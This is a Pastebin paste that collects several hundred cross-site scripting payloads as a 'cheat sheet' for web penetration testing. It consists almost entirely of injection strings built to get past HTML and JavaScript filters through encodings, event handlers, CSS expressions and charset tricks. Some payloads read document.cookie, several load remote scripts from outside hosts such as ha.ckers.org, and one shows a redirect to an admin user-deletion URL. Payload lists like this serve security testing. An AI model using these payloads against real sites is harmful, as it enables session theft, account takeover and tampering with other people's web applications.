J3wRy

Top 500 Most Important XSS Script Cheat Sheet for Web Applic

Mar 7th, 2018
112
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.93 KB | None | 0 0
  1. Top 500 Most Important XSS Script Cheat Sheet for Web Application Penetration Testing
  2.  
  3. <body oninput=javascript:alert(1)><input autofocus>
  4. <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
  5. <frameset onload=javascript:alert(1)>
  6. <table background="javascript:javascript:alert(1)">
  7. <!--<img src="--><img src=x onerror=javascript:alert(1)//">
  8. <comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
  9. <![><img src="]><img src=x onerror=javascript:alert(1)//">
  10. <style><img src="</style><img src=x onerror=javascript:alert(1)//">
  11. <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
  12. <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
  13. <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
  14. <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
  15. <object data="data:text/html;base64,%(base64)s">
  16. <embed src="data:text/html;base64,%(base64)s">
  17. <b <script>alert(1)</script>0
  18. <div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
  19. <x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
  20. <embed src="javascript:alert(1)">
  21. <img src="javascript:alert(1)">
  22. <image src="javascript:alert(1)">
  23. <script src="javascript:alert(1)">
  24. <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
  25. <? foo="><script>javascript:alert(1)</script>">
  26. <! foo="><script>javascript:alert(1)</script>">
  27. </ foo="><script>javascript:alert(1)</script>">
  28. <? foo="><x foo='?><script>javascript:alert(1)</script>'>">
  29. <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
  30. <% foo><x foo="%><script>javascript:alert(1)</script>">
  31. <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
  32. <img \x00src=x onerror="alert(1)">
  33. <img \x47src=x onerror="javascript:alert(1)">
  34. <img \x11src=x onerror="javascript:alert(1)">
  35. <img \x12src=x onerror="javascript:alert(1)">
  36. <img\x47src=x onerror="javascript:alert(1)">
  37. <img\x10src=x onerror="javascript:alert(1)">
  38. <img\x13src=x onerror="javascript:alert(1)">
  39. <img\x32src=x onerror="javascript:alert(1)">
  40. <img\x47src=x onerror="javascript:alert(1)">
  41. <img\x11src=x onerror="javascript:alert(1)">
  42. <img \x47src=x onerror="javascript:alert(1)">
  43. <img \x34src=x onerror="javascript:alert(1)">
  44. <img \x39src=x onerror="javascript:alert(1)">
  45. <img \x00src=x onerror="javascript:alert(1)">
  46. <img src\x09=x onerror="javascript:alert(1)">
  47. <img src\x10=x onerror="javascript:alert(1)">
  48. <img src\x13=x onerror="javascript:alert(1)">
  49. <img src\x32=x onerror="javascript:alert(1)">
  50. <img src\x12=x onerror="javascript:alert(1)">
  51. <img src\x11=x onerror="javascript:alert(1)">
  52. <img src\x00=x onerror="javascript:alert(1)">
  53. <img src\x47=x onerror="javascript:alert(1)">
  54. <img src=x\x09onerror="javascript:alert(1)">
  55. <img src=x\x10onerror="javascript:alert(1)">
  56. <img src=x\x11onerror="javascript:alert(1)">
  57. <img src=x\x12onerror="javascript:alert(1)">
  58. <img src=x\x13onerror="javascript:alert(1)">
  59. <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
  60. <img src=x onerror=\x09"javascript:alert(1)">
  61. <img src=x onerror=\x10"javascript:alert(1)">
  62. <img src=x onerror=\x11"javascript:alert(1)">
  63. <img src=x onerror=\x12"javascript:alert(1)">
  64. <img src=x onerror=\x32"javascript:alert(1)">
  65. <img src=x onerror=\x00"javascript:alert(1)">
  66. <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
  67. <img src="x` `<script>javascript:alert(1)</script>"` `>
  68. <img src onerror /" '"= alt=javascript:alert(1)//">
  69. <title onpropertychange=javascript:alert(1)></title><title title=>
  70. <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
  71. <!--[if]><script>javascript:alert(1)</script -->
  72. <!--[if<img src=x onerror=javascript:alert(1)//]> -->
  73. <script src="/\%(jscript)s"></script>
  74. <script src="\\%(jscript)s"></script>
  75. <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
  76. <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
  77. <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
  78. <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
  79. <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
  80. <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
  81. <style>*[{}@import'%(css)s?]</style>X
  82. <div style="font-family:'foo&#10;;color:red;';">XXX
  83. <div style="font-family:foo}color=red;">XXX
  84. <// style=x:expression\28javascript:alert(1)\29>
  85. <style>*{x:expression(javascript:alert(1))}</style>
  86. <div style=content:url(%(svg)s)></div>
  87. <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
  88. <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
  89. <div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
  90. <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
  91. <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
  92. <x style="background:url('x&#1;;color:red;/*')">XXX</x>
  93. <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
  94. <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
  95. <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
  96. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
  97. <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
  98. <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
  99. <meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
  100. X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
  101. 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
  102.  
  103.  
  104.  
  105. <IMG SRC="jav&#x0D;ascript:alert('XSS');">
  106. perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
  107. <IMG SRC=" &#14; javascript:alert('XSS');">
  108. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  109. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  110. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  111. <<SCRIPT>alert("XSS");//<</SCRIPT>
  112. <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
  113. <SCRIPT SRC=//ha.ckers.org/.j>
  114. <IMG SRC="javascript:alert('XSS')"
  115. <iframe src=http://ha.ckers.org/scriptlet.html <
  116. \";alert('XSS');//
  117. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  118. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  119. <BODY BACKGROUND="javascript:alert('XSS')">
  120. <IMG DYNSRC="javascript:alert('XSS')">
  121. <IMG LOWSRC="javascript:alert('XSS')">
  122. <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
  123. <IMG SRC='vbscript:msgbox("XSS")'>
  124. <IMG SRC="livescript:[code]">
  125. <BODY ONLOAD=alert('XSS')>
  126. <BGSOUND SRC="javascript:alert('XSS');">
  127. <BR SIZE="&{alert('XSS')}">
  128. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  129. <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
  130. <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
  131. <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
  132. <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
  133. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  134. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  135. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
  136. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
  137. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  138. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  139. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  140. <XSS STYLE="xss:expression(alert('XSS'))">
  141. <XSS STYLE="behavior: url(xss.htc);">
  142. ¼script¾alert(¢XSS¢)¼/script¾
  143. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  144. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  145. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
  146. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  147. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  148. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  149. <TABLE BACKGROUND="javascript:alert('XSS')">
  150. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
  151. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  152. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  153. <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
  154. <DIV STYLE="width: expression(alert('XSS'));">
  155. <BASE HREF="javascript:alert('XSS');//">
  156. <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
  157. <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  158. <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
  159. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
  160. <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
  161. <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
  162. Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
  163. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
  164. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  165. <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  166. <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  167. <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  168. <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  169. <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  170. <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  171. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  172. <A HREF="http://66.102.7.147/">XSS</A>
  173. <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
  174. <A HREF="http://1113982867/">XSS</A>
  175. <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
  176. <A HREF="http://0102.0146.0007.00000223/">XSS</A>
  177. <A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
  178. <iframe src="&Tab;javascript:prompt(1)&Tab;">
  179. <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
  180. <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
  181. <sVg><scRipt >alert&lpar;1&rpar; {Opera}
  182. <img/src=`` onerror=this.onerror=confirm(1)
  183. <form><isindex formaction="javascript&colon;confirm(1)"
  184. <img src=``&NewLine; onerror=alert(1)&NewLine;
  185. <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
  186. <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
  187. <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
  188. <script /**/>/**/alert(1)/**/</script /**/
  189. &#34;&#62;<h1/onmouseover='\u0061lert(1)'>
  190. <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
  191. <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
  192. <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
  193. <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
  194. <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
  195. <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
  196. <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
  197. </script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>
  198. <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
  199. <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
  200. <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
  201. http://www.google<script .com>alert(document.location)</script
  202. <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
  203. <img/src=@&#32;&#13; onerror = prompt('&#49;')
  204. <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
  205.  
  206.  
  207.  
  208. <script ^__^>alert(String.fromCharCode(49))</script ^__^
  209. </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
  210. &#00;</form><input type&#61;"date" onfocus="alert(1)">
  211. <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
  212. <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
  213. <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
  214. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
  215. <script ~~~>alert(0%0)</script ~~~>
  216. <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
  217. <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
  218. <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
  219. &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
  220. &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
  221. <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
  222. <div/style="width:expression(confirm(1))">X</div> {IE7}
  223. <iframe// src=javaSCRIPT&colon;alert(1)
  224. //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
  225. /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
  226. //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
  227. </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
  228. <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
  229. </plaintext\></|\><plaintext/onmouseover=prompt(1)
  230. </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
  231. <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
  232. <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
  233. <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
  234. <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
  235. <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  236. <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  237. <var onmouseover="prompt(1)">On Mouse Over</var>
  238. <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
  239. <img src="/" =_=" title="onerror='prompt(1)'">
  240. <%<!--'%><script>alert(1);</script -->
  241. <script src="data:text/javascript,alert(1)"></script>
  242. <iframe/src \/\/onload = prompt(1)
  243. <iframe/onreadystatechange=alert(1)
  244. <svg/onload=alert(1)
  245. <input value=<><iframe/src=javascript:confirm(1)
  246. <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
  247. <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  248. <img src=`xx:xx`onerror=alert(1)>
  249. <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
  250. <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  251. <math><a xlink:href="//jsfiddle.net/t846h/">click
  252. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
  253. <svg contentScriptType=text/vbs><script>MsgBox+1
  254. <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
  255. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
  256. <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  257. <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
  258. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
  259. <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  260. <script>+-+-1-+-+alert(1)</script>
  261. <body/onload=&lt;!--&gt;&#10alert(1)>
  262. <script itworksinallbrowsers>/*<script* */alert(1)</script
  263. <img src ?itworksonchrome?\/onerror = alert(1)
  264. <svg><script>//&NewLine;confirm(1);</script </svg>
  265. <svg><script onlypossibleinopera:-)> alert(1)
  266. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  267. <script x> alert(1) </script 1=2
  268. <div/onmouseover='alert(1)'> style="x:">
  269. <--`<img/src=` onerror=alert(1)> --!>
  270. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  271. <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
  272. "><img src=x onerror=window.open('https://www.google.com/');>
  273. <form><button formaction=javascript&colon;alert(1)>CLICKME
  274. <math><a xlink:href="//jsfiddle.net/t846h/">click
  275. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
  276. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  277. <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
  278.  
  279. '';!--"<XSS>=&{()}
  280. '>//\\,<'>">">"*"
  281. '); alert('XSS
  282. <script>alert(1);</script>
  283. <script>alert('XSS');</script>
  284. <IMG SRC="javascript:alert('XSS');">
  285. <IMG SRC=javascript:alert('XSS')>
  286. <IMG SRC=javascript:alert('XSS')>
  287. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
  288. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  289. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  290. <script>alert(String.fromCharCode(88,83,83))</script>
  291. <img src=foo.png onerror=alert(/xssed/) />
  292. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
  293. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
  294. <marquee><script>alert('XSS')</script></marquee>
  295. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
  296. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
  297. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
  298. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  299. "><script>alert(0)</script>
  300. <script src=http://yoursite.com/your_files.js></script>
  301. </title><script>alert(/xss/)</script>
  302. </textarea><script>alert(/xss/)</script>
  303. <IMG LOWSRC=\"javascript:alert('XSS')\">
  304. <IMG DYNSRC=\"javascript:alert('XSS')\">
  305. <font style='color:expression(alert(document.cookie))'>
  306. <img src="javascript:alert('XSS')">
  307. <script language="JavaScript">alert('XSS')</script>
  308.  
  309.  
  310.  
  311. <body onunload="javascript:alert('XSS');">
  312. <body onLoad="alert('XSS');"
  313. [color=red' onmouseover="alert('xss')"]mouse over[/color]
  314. "/></a></><img src=1.gif onerror=alert(1)>
  315. window.alert("Bonjour !");
  316. <div style="x:expression((window.r==1)?'':eval('r=1;
  317. alert(String.fromCharCode(88,83,83));'))">
  318. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
  319. "><script alert(String.fromCharCode(88,83,83))</script>
  320. '>><marquee><h1>XSS</h1></marquee>
  321. '">><script>alert('XSS')</script>
  322. '">><marquee><h1>XSS</h1></marquee>
  323. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
  324. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
  325. <script>var var = 1; alert(var)</script>
  326. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  327. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
  328. <IMG SRC='vbscript:msgbox(\"XSS\")'>
  329. " onfocus=alert(document.domain) "> <"
  330. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
  331. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
  332. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
  333. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
  334. <br size=\"&{alert('XSS')}\">
  335. <scrscriptipt>alert(1)</scrscriptipt>
  336. </br style=a:expression(alert())>
  337. </script><script>alert(1)</script>
  338. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  339. [color=red width=expression(alert(123))][color]
  340. <BASE HREF="javascript:alert('XSS');//">
  341. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  342. "></iframe><script>alert(123)</script>
  343. <body onLoad="while(true) alert('XSS');">
  344. '"></title><script>alert(1111)</script>
  345. </textarea>'"><script>alert(document.cookie)</script>
  346. '""><script language="JavaScript"> alert('X \nS \nS');</script>
  347. </script></script><<<<script><>>>><<<script>alert(123)</script>
  348. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  349. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  350. '></select><script>alert(123)</script>
  351. '>"><script src = 'http://www.site.com/XSS.js'></script>
  352. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  353. <SCRIPT>document.write("XSS");</SCRIPT>
  354. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
  355. ='><script>alert("xss")</script>
  356. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
  357. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
  358. ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
  359. ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
  360. src="http://www.site.com/XSS.js"></script>
  361. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
  362. !--" /><script>alert('xss');</script>
  363. <script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
  364. "><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
  365. '"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
  366. <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
  367. <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
  368. "><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
  369. '"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
  370. <iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
  371. '><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
  372. "><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
  373. \'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
  374. http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
  375. http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??
  376. '); alert('xss'); var x='
  377. \\'); alert(\'xss\');var x=\'
  378. //--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
  379. >"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
  380. <img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u00